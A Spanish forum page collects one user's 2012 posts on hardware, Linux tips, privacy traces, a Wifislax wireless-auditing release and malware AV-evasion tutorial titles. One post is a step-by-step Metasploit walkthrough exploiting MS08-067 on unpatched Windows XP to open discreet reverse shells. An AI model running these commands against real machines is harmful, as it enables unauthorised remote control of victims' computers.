Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#162
Hardware y Reparaciones / Diferencia en un cable HDMI caro y uno barato
Abril 04, 2012, 11:23:13 AM
Cuál es la diferencia entre un cable HDMI barato y uno caro? Por ejemplo, cuál creen ustedes que es la diferencia entre un cable que vende Amazon España por 3,68€ y uno de 150€ que se vende en Pixmanía?
Respuesta corta: no hay diferencia alguna. Si necesitas un cable HDMI, compra el más barato, no te lo cuestiones ni te o preguntes más. Para el 99% de los casos (conectar la consola de videojuegos, el home theater, el DVR o el reproductor de Blu-Ray a la TV y otros usos "caseros"), es mucho más que suficiente.
Respuesta larga: no solo no hay diferencia alguna, sino que la variación de costos más que depender de la calidad de construcción del cable, tiene relación con el margen de ganancia que una marca está dispuesta a tener aprovechándose del desconocimiento general del cliente frente a una tecnología que tiene poco tiempo desde que se adopta a nivel general.
HDMI (High-Definition Multimedia Interface) es un estándar de audio y vídeo digital cifrado sin compresión apoyado por la industria sustituír al euroconector. Al ser datos digitales, el cable simplemente se encarga de transmitir los 1 y los 0 entre dos aparatos que entienden el estándar y se encargan de interpretarlos para mostrar una imagen y/o reproducir un sonido. Es simplemente un medio de transmisión de datos.
En la década de los 80s y los 90s se popularizó la práctica de poner precios muy altos a cables supuestamente premium especialmente para conectar altavoces a equipos de sonido y reproductores VHS o DVD a la TV. La señal, al ser análoga, supuestamente mejoraba cuando el material del cable era superior, la técnica fue un éxito, no solo por el deseo de que el video o audio se vea y suene mejor, sino porque compañías como Monster Cable representaban (y aún representan) márgenes muy altos para las tiendas de electrónica/audio/video, llegando al punto que se puede llegar a ganar más dinero vendiendo cables que vendiendo reproductores. En consecuencia, los vendedores de este tipo de establecimientos están entrenados para ofrecer al cliente justamente estos cables.
Pero la realidad es que aún con señales análogas no se percibieron diferencias reales usando el método de doble ciego para determinar si un cable de $300 dólares funciona mejor que uno de $15. Considerando que con una señal digital solo se transmiten impulsos eléctricos que representan 1 y 0, tampoco habrá diferencia alguna.
Y no, un conector de oro tampoco mejora la señal o la calidad.
Una nueva técnica usada por las marcas de cables es usar las versiones del estándar HDMI, poniéndole un precio mayor a un cable HDMI 1.4 que a un cable HDMI 1.3. La realidad es que (al menos en Estados Unidos) los fabricantes tienen prohibido usar las versiones de HDMI como característica de marketing para sus cables porque también es engañoso.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#163
Desarrollo y modificación de malwares / Tutoriales de AvFucker, DSplit, RIT, Hexing, etc
Abril 03, 2012, 04:11:01 PMTutoriales de AvFucker, DSplit, RIT, Hexing, etc
Introducción
Parte 1
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7
Parte 1
Parte 2
Parte 3
Parte 4
Parte 5
Parte 6
Parte 7
Autor: Rudeboy1991
#164
GNU/Linux / Automatiza el apagado del ordenador al terminar de descargar
Marzo 31, 2012, 09:43:03 AMDespués de haber probado varios gestores de descargas de archivos torrent, siempre vuelvo a No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, sobre todo por su sencillez y su fácil configuración, además de consumir menos recursos que otros. Tampoco he notado diferencias en la velocidad, que al final es lo que más me interesa.
Sin embargo una cosa que se echa en falta (no solo en este gestor), es una opción para que nuestro ordenador se apague automáticamente cuando termine de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta Pero lo que si tiene es una posibilidad, que ya utilizaba en Tucan, que es la de poder ejecutar un script al completar el No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, lo que nos abre un abanico de posibilidades de agregar cualquier función.
En el caso de querer automatizar el apagado del ordenador primero debemos dar permisos para hacerlo, para que no pida contraseña ni confirmación. Voy a explicar como hacerlo a través de la terminal, pero si os resulta más cómodo en modo gráfico, no hay problema.
Primero editaremos el archivo sudoers:
CitarCódigo: text [b]sudo nano /etc/sudoers[/b]
Al final del archivo añadimos la siguiente linea.
CitarCódigo: text [b]tu_usuario ALL=NOPASSWD: /sbin/shutdown[/b]
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Donde tu_usuario es vuestro nombre de usuario.
Ya podemos guardar de nuevo el archivo y continuar con el siguiente paso que es crear un sencillo script que apague el ordenador. En este caso lo llamaré auto_apagado.sh y dentro añadimos lo siguiente:
CitarCódigo: text [b]#!/bin/bash
sudo shutdown -h now[/b]
Lo guardamos donde nos parezca y le damos No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.
CitarCódigo: text [b]sudo chmod +x /ruta_archivo/auto_apagado.sh[/b]
Ya solo tenemos que activar la opción en Transmission, Tucán o cualquier programa que lo permita e indicarle la ruta del script:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#165
GNU/Linux / PlayOnLinux 4.0.16 con soporte para Origin, Desura y más…
Marzo 31, 2012, 09:42:02 AMNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta es un software que permite instalar y utilizar fácilmente numerosos juegos y aplicaciones diseñados para funcionar con No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y del que ha sido liberada hace unos días la versión 4.0.16 que viene con algunas nuevas características interesantes.
A parte de mejoras varias y corrección de errores, ahora es posible ejecutar un archivo .exe desde la terminal, han añadido soporte para No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, acceso a los discos virtuales desde su directorio de inicio, registrando los sucesos para simplificar la depuración de wine y más cosas.
Algunas de las características a parte de las ya mencionadas son:
- Comprueba la correcta configuración de la tarjeta de vídeo
- Soporte para Origin y Desura
- Incluye instalación automática de Gecko
- Posibilidad de detectar errores en No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
- No más mensajes "winemenubuilder not found"
- Posibilidad de salir de un proceso de instalación "atascado"
- Colorear la salida del terminal
- Muchas correcciones de errores
- Añadidos una gran cantidad de nuevos No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta soportados
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Para instalarlo, en su No tienes permitido ver enlaces. Registrate o Entra a tu cuenta podemos encontrar el código fuente o instaladores para Archlinux, Debian, Fedora, Frugalware y Ubuntu. Este ultimo también dispone de repositorios para diversas versiones.
La instalación para Ubuntu 11.10 y LinuxMint12, sería:
Citar
wget -q "No tienes permitido ver enlaces. Registrate o Entra a tu cuenta" -O- | sudo apt-key add -
sudo wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta -O /etc/apt/sources.list.d/playonlinux.list
sudo apt-get update
sudo apt-get install playonlinux
Para más información sobre los cambios, modo de instalación y su descarga, no dudéis en visitar su No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.
#166
Hacking / Accediendo a Windows XP desde BackTrack 5 utilizando Metasploit
Marzo 31, 2012, 06:47:58 AMEn este tutorial explicare como acceder a una PC con Windows XP (sin sus actualizaciones de seguridad) utilizando No tienes permitido ver enlaces. Registrate o Entra a tu cuenta en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta y el famoso exploit No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.
La idea de este tutorial es que sepan lo vulnerable que es un sistema sin descargar las actualizaciones.
Requisitos para este tutorial:
- La PC a la que vamos a acceder debe tener Windows XP, SP1, SP2 o SP3, Windows 2000 o 2003. Y no debe tener los parches de seguridad. Tambien recomendaria desactivar firewalls y antivirus para evitar problemas.
- Para simplificar el tutorial supondremos que la PC a atacar esta en la misma red que la PC Atacante. El exploit tambien funciona con PCs que no esten en la misma red, solo que hay que tener en cuenta otras variables, como el router y el firewall, que no se tendran en cuenta en este tutorial.
- Usare como SO atacante BackTrack 5 que ya viene con todas las herramientas, pueden descargar la iso desde la pagina oficial --> No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Despues que descargaron la iso la guardan en un CD/DVD y arrancan el Sistema operativo desde el CD/DVD, o si no pueden usar una maquina virtual como vmware, o virtual box y arrancar el sistema operativo desde la iso. No detallare esto ya que hay mucha informacion en internet de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.
Comenzamos...
1- Comenzamos obteniendo nuestra ip local para saber donde estamos ubicados en la red. Para ello ya dentro de BackTrack Abrimos una Terminal (Ctrl+Alt+T) y escribimos:
ifconfig
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Como podemos ver nuestra IP local es 10.0.0.3, podria ser otra del tipo 192.168.X.X o de otro tipo. Apuntamos esta direccion porque nos servira mas adelante.
2- Escaneamos la red con nmap para obtener la direccion IP de los posibles objetivos. Como nuestra IP local es 10.0.0.3, buscaremos objetivos entre el rango 10.0.0.1 y 10.0.0.30, para ello escribimos lo siguiente
nmap -sS -O [Rango de IP]
Ejemplo: nmap -sS -O 10.0.0.1-30
Ejemplo2: nmap -sS -O 192.168.1.1-255
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Como podemos ver tenemos una PC con Linux (que no es vulnerable al ataque) y otra con Windows XP, 2000 o 2003 que posiblemente es vulnerable al ataque. Y su IP es 10.0.0.4. Apuntaremos esta IP para usarla despues.
Si ya tenemos la IP del objetivo no es necesario hacer este paso asi que simplemente lo saltean.
3- Ya sabemos nuestra IP y la IP del objetivo asi que ahora procederemos al ataque.
Abrimos Metasploit escribiendo en la terminal:
msfconsole
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Nos saldra algo asi:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
4- Sleccionaremos el exploit Netapi escribiendo lo siguiente:
use exploit/windows/smb/ms08_067_netapi
5- Seteamos como objetivo a la IP de la PC con windows XP:
set RHOST [IP Objetivo]
Ejemplo: set RHOST 10.0.0.4
6- Ahora cargaremos el Payload. En este tutorial mostrare 2 tipos de Payload diferentes, "windows/shell/reverse_tcp" y "windows/vncinject/reverse_tcp"
"windows/shell/reverse_tcp" es una shell remota, se usa cuando se necesita discrecion. El usuario de la PC objetivo no notara que estamos controlando su PC.
Cargamos escribiendo lo siguiente:
set PAYLOAD windows/shell/reverse_tcp
7- Seteamos con nuestra IP local:
set LHOST [IP Local]
Ejemplo: set LHOST 10.0.0.3
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
8- Enviamos el exploit:
exploit
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y listo! Acceso concedido, ya tenemos una shell remota de la PC con windows XP! Con esta shell tenemos acceso total.
Ahora como otra alternativa usaremos el Payload de VNC "windows/vncinject/reverse_tcp", este Payload permite ver el escritorio remoto. No es nada discreto.
Ahora podemos seguir a partir del punto 5, o seguir desde el punto 8. Es lo mismo.
9- Presionamos (Ctrl+C) para cerrar la conexion de la shell.
10- Cargamos el Payload escribiendo:
set PAYLOAD windows/vncinject/reverse_tcp
11- Seteamos con nuestra IP local:
set LHOST [IP local]
Ejemplo: set LHOST 10.0.0.3
12- Enviamos el exploit escribiendo:
exploit
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Y listo ya tenemos acceso remoto a la PC con windows XP mediante VNC!
Resumen de los comandos utilizados:
Tomando como ejemplo las siguientes IPs:
IP de nuestra pc (BackTrack): 10.0.0.3
IP de la PC objetivo (Windows XP): 10.0.0.4
Citarmsfconsole
ifconfig
nmap -sS -O 10.0.0.1-255
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.4
set PAYLOAD windows/shell/reverse_tcp
set LHOST 10.0.0.3
exploit
Como pueden ver son muy pocos los comandos utilizados, por lo que a una persona con conocimientos basicos de Metasploit se le hace muy facil acceder a una PC con windows XP sin los parches de seguridad.
Se recomienda actualizar windows XP para evitar este tipo de ataques.
Links de interes:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#167
Seguridad / 7 huellas que dejas en el PC sin saberlo
Marzo 31, 2012, 06:33:30 AM
La privacidad es un asunto que nunca se toma lo bastante en serio. Hoy en día, con las herramientas adecuadas, cualquiera puede entrar en tu ordenador, saber qué has estado haciendo en las últimas horas y usar esa información en tu contra.
Pasar un limpiador para borrar la caché de los navegadores es útil, pero hay sitios adonde ni siquiera los limpiadores llegan. Son huellas escondidas y a veces protegidas por el sistema operativo. Te las presentamos y te explicamos cómo borrarlas.
Caché de DNS
Cada vez que cargas una página web en tu navegador, Windows pasa la orden a un servidor DNS para que traduzca el nombre del dominio a una dirección IP. Para ahorrar tiempo, el sistema guarda muchas de estas equivalencias en una caché aparte. Ni que decir tiene, esta información puede sacarse con facilidad.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta permite ver todas las peticions DNS guardadas por Windows
Abre la opción --> File --> Load Windows DNS caché
Si alguien abre la caché de DNS, por ejemplo con DNSDataView, sabrá qué páginas visitas con mayor frecuencia. Para borrarla, puedes usar esa misma utilidad o bien teclear ipconfig /flushdns en la línea de comandos. CCleaner también permite hacerlo desde la sección Sistema, pero la casilla está desactivada por defecto.
Identificadores de memorias y discos USB conectados
Quizá no sepas que cada vez que conectas un disco a un ordenador con Windows, su identificador queda almacenado en el Registro de Windows. Se puede sacar información tan valiosa como el número de serie, la marca, el modelo y cuando se escribió en el aparato por última vez.

USBOblivion borra las huellas de todas las memorias extraíbles que conectaste en el pasado
Para borrar estas huellas puedes usar USBOblivion, una utilidad portable que escanea el Registro en busca de identificadores de dispositivos de almacenamiento extraíble y los elimina.
Caché de Flash y Java
La caché de los navegadores web se limita a las páginas web y a las imágenes. Muchas aplicaciones web programadas con Flash y Java no se ven afectadas por la limpieza de caché clásica, puesto que almacenan archivos en las caché de los plugins.
CCleaner puede borrar tanto la caché de Flash como la de Java, pero si prefieres tener más control sobre lo que borras hay que recurrir a los paneles de cada complemento. Para Flash, entra en Panel de control de Flash y echa un vistazo al contenido.

Cookies, imágenes, sonidos, partidas de juegos web... la caché de Flash es una mina
Por lo que se refiere a Java, sigue estos sencillos pasos del manual de Oracle. Si quieres evitar que Java almacene contenido temporal en el ordenador, desmarca la primera casilla de la Configuración de archivos temporales.
Borrar la caché de Java es bastante sencillo: solo tienes que hacer clic en Borrar archivos...
Archivo de paginación (Pagefile.sys)
El archivo de paginación, conocido también como espacio de intercambio o swap, se utiliza como memoria virtual en PC que no tienen suficiente RAM para algunas tareas. En el swap acaban muchos datos confidenciales.
En este artículo de Microsoft se explica cómo solicitar a Windows que limpie el archivo Pagefile.sys cada vez que se apague el equipo. Debes abrir el Editor de Registro (regedit.exe) y cambiar el valor ClearPageFileAtShutdown de esta clave:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
El tipo debe ser REG_DWORD y el valor igual a 1. Ten en cuenta que activando esta limpieza el apagado tomará más tiempo, pero te asegurarás de que no queden contraseñas u otros datos en la memoria de intercambio.
Cambia el valor de ClearPageFileAtShutdown a 1 para activar el borrado del swap al apagar
Archivos borrados
Como explicamos en nuestro especial sobre borrado seguro, cuando borras un archivo desde la Papelera no lo estás eliminando para siempre; el PC evita emprender una tarea tan costosa como sobrescribir el disco varias veces.
El prodigioso Hardwipe borra archivos e incluso discos enteros de forma segura
Para eliminar archivos con total garantía de irreversibilidad, usa Hardwipe. Está traducido al español y es muy fácil de usar. Un correcto uso de herramientas de este tipo impide que Recuva y similares sean eficaces.
Fechas de los archivos
Cuando creas o modificas un archivo, el sistema toma nota del momento en que llevaste a cabo esas operaciones. Así, las fechas de creación, modificación y último acceso pueden decir mucho sobre la vida del documento. Cambiar estas fechas de manera efectiva es tan sencillo como usar Timestomp o File Touch.
Con File Touch puedes cambiar la fecha y hora de muchos archivos a la vez

Metadatos
Los metadatos son el carnet de identidad de un archivo. Pueden contener datos sobre el autor, el momento en que se creó el documento o el lugar en que tuvo lugar la edición. Útiles para algunos, peligrosos para otros, conviene saber cómo se borran.
Metadatos EXIF de una foto en formato JPG. Aparecen la cámara y la fecha original
En el especial sobre metadatos presentamos las mejores herramientas para eliminar y editar metadatos, como MetaStripper y Doc Scrubber. La mejor medida, con todo, consiste en configurar los programas de antemano para que no graben metadatos.
Fuente:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Pasar un limpiador para borrar la caché de los navegadores es útil, pero hay sitios adonde ni siquiera los limpiadores llegan. Son huellas escondidas y a veces protegidas por el sistema operativo. Te las presentamos y te explicamos cómo borrarlas.
Caché de DNS
Cada vez que cargas una página web en tu navegador, Windows pasa la orden a un servidor DNS para que traduzca el nombre del dominio a una dirección IP. Para ahorrar tiempo, el sistema guarda muchas de estas equivalencias en una caché aparte. Ni que decir tiene, esta información puede sacarse con facilidad.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta permite ver todas las peticions DNS guardadas por Windows
Abre la opción --> File --> Load Windows DNS caché
Si alguien abre la caché de DNS, por ejemplo con DNSDataView, sabrá qué páginas visitas con mayor frecuencia. Para borrarla, puedes usar esa misma utilidad o bien teclear ipconfig /flushdns en la línea de comandos. CCleaner también permite hacerlo desde la sección Sistema, pero la casilla está desactivada por defecto.
Identificadores de memorias y discos USB conectados
Quizá no sepas que cada vez que conectas un disco a un ordenador con Windows, su identificador queda almacenado en el Registro de Windows. Se puede sacar información tan valiosa como el número de serie, la marca, el modelo y cuando se escribió en el aparato por última vez.

USBOblivion borra las huellas de todas las memorias extraíbles que conectaste en el pasado
Para borrar estas huellas puedes usar USBOblivion, una utilidad portable que escanea el Registro en busca de identificadores de dispositivos de almacenamiento extraíble y los elimina.
Caché de Flash y Java
La caché de los navegadores web se limita a las páginas web y a las imágenes. Muchas aplicaciones web programadas con Flash y Java no se ven afectadas por la limpieza de caché clásica, puesto que almacenan archivos en las caché de los plugins.
CCleaner puede borrar tanto la caché de Flash como la de Java, pero si prefieres tener más control sobre lo que borras hay que recurrir a los paneles de cada complemento. Para Flash, entra en Panel de control de Flash y echa un vistazo al contenido.

Cookies, imágenes, sonidos, partidas de juegos web... la caché de Flash es una mina
Por lo que se refiere a Java, sigue estos sencillos pasos del manual de Oracle. Si quieres evitar que Java almacene contenido temporal en el ordenador, desmarca la primera casilla de la Configuración de archivos temporales.
Borrar la caché de Java es bastante sencillo: solo tienes que hacer clic en Borrar archivos...
Archivo de paginación (Pagefile.sys)
El archivo de paginación, conocido también como espacio de intercambio o swap, se utiliza como memoria virtual en PC que no tienen suficiente RAM para algunas tareas. En el swap acaban muchos datos confidenciales.
En este artículo de Microsoft se explica cómo solicitar a Windows que limpie el archivo Pagefile.sys cada vez que se apague el equipo. Debes abrir el Editor de Registro (regedit.exe) y cambiar el valor ClearPageFileAtShutdown de esta clave:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
El tipo debe ser REG_DWORD y el valor igual a 1. Ten en cuenta que activando esta limpieza el apagado tomará más tiempo, pero te asegurarás de que no queden contraseñas u otros datos en la memoria de intercambio.
Cambia el valor de ClearPageFileAtShutdown a 1 para activar el borrado del swap al apagar
Archivos borrados
Como explicamos en nuestro especial sobre borrado seguro, cuando borras un archivo desde la Papelera no lo estás eliminando para siempre; el PC evita emprender una tarea tan costosa como sobrescribir el disco varias veces.
El prodigioso Hardwipe borra archivos e incluso discos enteros de forma segura
Para eliminar archivos con total garantía de irreversibilidad, usa Hardwipe. Está traducido al español y es muy fácil de usar. Un correcto uso de herramientas de este tipo impide que Recuva y similares sean eficaces.
Fechas de los archivos
Cuando creas o modificas un archivo, el sistema toma nota del momento en que llevaste a cabo esas operaciones. Así, las fechas de creación, modificación y último acceso pueden decir mucho sobre la vida del documento. Cambiar estas fechas de manera efectiva es tan sencillo como usar Timestomp o File Touch.
Con File Touch puedes cambiar la fecha y hora de muchos archivos a la vez

Metadatos
Los metadatos son el carnet de identidad de un archivo. Pueden contener datos sobre el autor, el momento en que se creó el documento o el lugar en que tuvo lugar la edición. Útiles para algunos, peligrosos para otros, conviene saber cómo se borran.
Metadatos EXIF de una foto en formato JPG. Aparecen la cámara y la fecha original
En el especial sobre metadatos presentamos las mejores herramientas para eliminar y editar metadatos, como MetaStripper y Doc Scrubber. La mejor medida, con todo, consiste en configurar los programas de antemano para que no graben metadatos.
Fuente:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Vía: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#168
Seguridad Wireless / Liberada versión final de Wifislax 4.0
Marzo 31, 2012, 06:31:41 AM
Tras unos meses de desarrollo, No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta rescata el proyecto WIFISLAX, el cual quedo hace un par de años en su version 3.1.
Lanzamos la version 4.0, bajo un sistema basado en porteus, slax, wifiway y slackware 13.37, WIFISLAX 4 esta formado por paqueteria slackware 13.37 con lo que es fácil de ampliar buscando los paquetes ya hechos y convirtiéndolos a xzm.
Es una version de tamaño reducido, pero con lo necesario para auditar wireless aprovechando todos los ataques conocidos, como el último y más sonado fallo en wps y la ultilidad que lo aprovecha (reaver-wps).
Tenéis toda la bateria de desencriptadores de patrones conocidos, jazzteldecrypter, wlandecrypter, wpamagic, etc etc, además de multiattack 1.0.7 el cual de un plumazo es capaz de demostrar la vulnerabilidad de los routers al alcance, todo de un plumazo.
Generadores de diccionarios para ataques wpa, sniffers de red como wireshark, firefox 10.0.2 como navegador principal, con flashplayer 11 activado.
El sistema pesa unos 200 megas aproximados, ¿ por qué aun siendo pequeño es grande en tamaño?, pues por que queremos ofrecer una base, en la cual se puede hacer otras cosas...como escuchar musica o ver videos..navegar ...ademas ofrecemos bastante cantidad de drivers de todo tipo, si empezásemos a quitar todo eso fácilmente saldría un sistema como los que circulan por la red de unos 50-60 megas ... pero no buscamos eso.
El sistema cuenta con el kernel 3.1.10 al que se le aplicaron varios parches ... como el aspm, que corregia el excesivo consumo de energia de los kerneles 3.1.x por un fallo, además se le añadio el parche de john kolivas, el cual hace que la cpu no este todo el tiempo consumiendo al 100%, y dos parches basicos para auditoria wireless, el famoso fix-channel-negative y el de fragmentación.
Se ha buscado deliberadamente que el aspecto sea como el de wifiway, usando sus mismos iconos aunque no tan agresivo el entorno.
WIFISLAX 4, se puede ampliar fácilmente mediante modulos xzm, o paqueteria slackware la cual se puede convertir a xzm con un sólo click, o añadiéndole el módulo devel, el cual cuenta con herramientas de desarrollo, como las gcc, git, o subversion para poder compilar vuestros propios programas, el módulo devel sólo sirve para eso...compilar codigo.
La distribucion ofrece soporte NATIVO, para la tarjeta wifistation interior, creo que somos los unicos que ofrecemos soporte a dicho adaptador, puesto que sólo se consigue editando parte de los drivers ath9k.
Al mismo tiempo que lanzamos la iso, se añadirán varios módulos de diversas índoles ...( aplicaciones, algun driver, etc.)
Se comenzó el sistema usando como base inicial una iso porteus 1.0rc2 a la cual se le fueron añadiendo y modificando cosas según las necesidades, este es el log del trabajo realizado.
CitarLIBRERIAS AÑADIDAS DEL REPOSITORIO SLACKWARE 13.37
-BISON
-FLEX
-LIBCAP
-cairomm-1.9.8-i486
-curl-7.21.4-i486
-iw-0.9.20-i486-1
-glibmm-2.27.99.2-i486
-iproute2-2.6.37-i486
-libXxf86dga-1.1.2-i486
-gtkmm-2.24.0-i486
-libsigc++-2.2.9-i486
-xdpyinfo-1.2.0-i486
-atkmm-2.22.5-i486
-libnet-1.1.5-i486
-pangomm-2.28.2-i486
-------
-CAMBIADAS GCC POR LAS DE BERNI VERSION 4.6.1 y sus 2 dependencias
-añadido kommander editor y executor
-añadido GIT 1.7.8
-añadido subversion 1.6.16
-añadido apr y apr-utils
-añadido gparted 0.10.0
-añadido record my desktop 0.3.8
-añadido plugin flash 11.1 r102
-actualizadas glibc a version 2.14 de berni
-modificada secuencia de arranque para hacerla un poco mas vistosa
----------------------------Modulo wireless -------------------------
-aircrack-ng-trunk-2012-01-17-r2028
-airoscript nuevo portado de wifiway
-Alfatools ---> driver preinstalado,no necesitas instalarlo a cada sesion.
-cowpatty-4.6
-decsagem
-dlinkdecrypter-0.2
-ettercap-0.7.4
-feedingbottle-3.2
-Gambas-runtime
-GeneradorDiccio + configurador
-jazzteldecrypter-0.2.1
-john-the-ripper-1.7.9
-mac2wepkey
-macchanger-1.5.0
-minidwep-gtk-21026
-multiattack-1.0.6
-nmap-5.51
-ono4xx v0.0.4a
-pyrit-0.4.0
-reaver-1.3 + walsh 1.3
-R-WlanXDecrypter0.9
-salvar_sesion_reaver
-stkeys
-Stringenerator-1.3
-tele2dic_v0.2
-wepattack-0.1.3
-wepcrack
-wicd-1.7.0
-wifi-radar-2.0.s08
-wireshark-1.6.5
-wlan4xx-0.2.0
-wlandecrypter-1.3.3
-wlanreaver-0.5 ( adaptado a wifislax )
-Wpa-gui
-WPAmagickey-0.2.3
------- 20-01-2012 -----
-añadido kismet-2011-03-R2
-añadido tema gtk2 relight ( mismo tema gtk que wifiway )
-reconfigurado kde , en vez de utf8 , configurado a iso-8859-15 ( no da problemas con tildes
-reconfigurado rc6 , para que ejecute cleanup solo cuando estamos en live.
-actualizado gparted a version 0.11.0
-actualizado reaver a version 1.4-revision 102 ( test ok )
-------- 21-01-2012 ------
-retocado rc6 en la parte final del script faltaba codigo.
-eliminado del modulo core, ruta lib/modules/�2.6.37?
-modificado binario wpamagickey
--------22-01-2012---------
-cambiado idioma de sistema a español iso8859-15 (es_ES@euro)
-añadido enlace simbolico a libtheora
-añadido libffi 3.0.10
-añadido pgpme 1.3.0
-añadido slapt-get-0.10.2j
-añadido libassuan-2.0.1
-añadido gnupg-1.4.10
------23-01-2012-------
-añadido liblinuxlive (importantisimo para txz2xzm , deb2xzm etc )
-añadido stripdir (sin menus ni servicios ya que solo es para desaroolladores
-añadido xzm2dir (para instalar modulos xzm desde instalacion hd)
-añadido make_xorg y make_xorg_list
-arreglados conversores txz a xzm y deb a xzm (ya todo puede ser convertido a xzm)
-añadido merge_modules (unir varios modulos en 1 )
-actualizado reaver a version 1.4 final
-------24-01-2012-----------
-modificado minidwep , ya no lanza el cartel molesto inicial.
-actualizada suite aircrack , a revision 2031 del dia 24 de enero 2012
-eliminados los firmwares de videocamaras etc (ahorro 5 megas xzm y 15 megas en hd)
-añadida configuracion drivers ath9k nocrypth=1
-actualizados drivers wireless a ( compat-wireless-2012-01-23 )
-eliminacion de elementos de escritorio tales como sistemas de color extra
-eliminacion de los ficheros readme
-conpilado el driver r8187 alfatools ( se puede prescindir totalmente del devel )
-------15-2-2012-----
-añadido crda 1.1.2 ( txpower y canales 12 y13 )
-actualizado multiattack a version 1.0.7
-retocado install (hwagm)
-actualizado firmware ar9170
-añadido M2Crypto-0.20.2-i486-1
-actualizados drivers wireless a version compat-wireless-2012-02-01
con soporte para wifistation INTERIOR
-añadido el hdd module installer
-----18-02-2012------
-actualizada suite aircrack a version-r2101
-actualizados driver wireless a version 15-02-2012
---23-02-2012----
-actualizado gparted a version 0.12.0
-retiradas glibc-2.14 (incompatinilidad con kernel porteus)
-añadido glibc 2.13
-añadido kernel porteus 3.2.4
-actualizados drivers wireless , con soporte wifistation INTERIOR version 22-02-2012
-reconstruido modulo core ,para adaptarlo a kernel porteus
-remodificado initrd.xz para adaptar el arranque a wifislax
-remodificadas las opciones de arranque (eliminadas cosas obsoletas)
-------24-02-2012-------------
-configurado sistema a es_ES.utf8 ( es el que menos problemas da a la larga )
-eliminacion de kernel porteus
***** Integracion kernel 3.1.10 WIFISLAX *****
-Añadidas kernel soUrces recortadas
-Añadidos drivers compat-wireless con coporte wifistation INTERIOR
----25.02-2012--------
-RECOMPILADO KERNEL 3.1.10 por que no mostraba estado de bateria.
parcheado driver ath9k de kernel , para no añadir stack compat
wireless y añadirle a los drivers del kernel soporte nativo a
wifistation interior.
-------26-02-2012------
-arreglado servicio instalar paquetes slackware tgz y txz
-eliminado servicio convertir paquete rpm a xzm
-eliminado alfatools ( el driver no es valido en kerneles superiores a 3.1)
-eliminada gambas runtime (solo las usaba alfatools)
-ACTUALIZADO KERNEL A ULTIMA VERSION 3.2.7
-eliminado dlinkdecrypter por problema desconocido
------27-02-2012-------
-actualizado firefox a version 10.0.2
------28-02-2012-------------
-actualizado kernel a version de hoy mismo 3.2.8
--------02-03-012-------
-cambiado kernel a version 3.1.10 , por varios problemas detectados, sobretodo
en cuanto a drivers , por ejemplo minidwep se hace un lio con los kernles 3.2.x
ya que las interfaces al hacer iwconfig , ni siquiera se muestarn ordenadas.
-reconfigurado codificacion de sistema a es_ES@euro
-actualizada iw tool de 0.9.20 a version 3.3
---03-03-2012-----
-cambiado flashplayer 11 por version 10 mas estable
-recompilado kernel 3.1.10 + parche fragmentacion
-actualizado wicd a version 1.7.1
-añadida imlib que necesitaba kuickshow
-reconfigurado ksnapshot
----06-03-2012-----
-configurado crda a 20dbm
-creados 2 modulos de configuraciones a 27 y 30 dbm (dentro de la carpeta optional)
-recompilado kernel por que no mostraba el estado de la bateria
-eliminado de la raiz un simbolico llamado "sin" , que no valia para nada
--------13-03-2012---------
-corregido problemas con montaje/desmontaje unidades de almacenamiento
-eliminados simbolicos muertos en usr/bin
-corregido enlace simbolico de libstc++ para que la distro trabaje sin modulo devel
----20-03-2012-----
-añadida libreria ORBit2-2.14.19-i486-1
-añadida libreria libevent-2.0.11-i486-1sl
-añadida libreria libsoup-2.28.2
-añadida libreria GConf-2.32.1-i486-1
-añadida libreria libcanberra-0.28
-añadida libreria sudo-1.7.4p6-i486-1
-modificado minidwep ,ahora abre irodump y lo muestra mientras escanea y ataca.
-actualizado flashplayer a version 11
Como veis, el log acabo ayer mismo.
Agradecer a las personas que me han ayudado durante el desarrollo, mediante pruebas, ideas, avisos de actualicaciones etc.
Gracias al staff, que con la ayuda de todos son posibles estas cosas.

DESCARGA PRINCIPAL: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
MD5: 0d683b85155ee4d87db418d8c6bce297
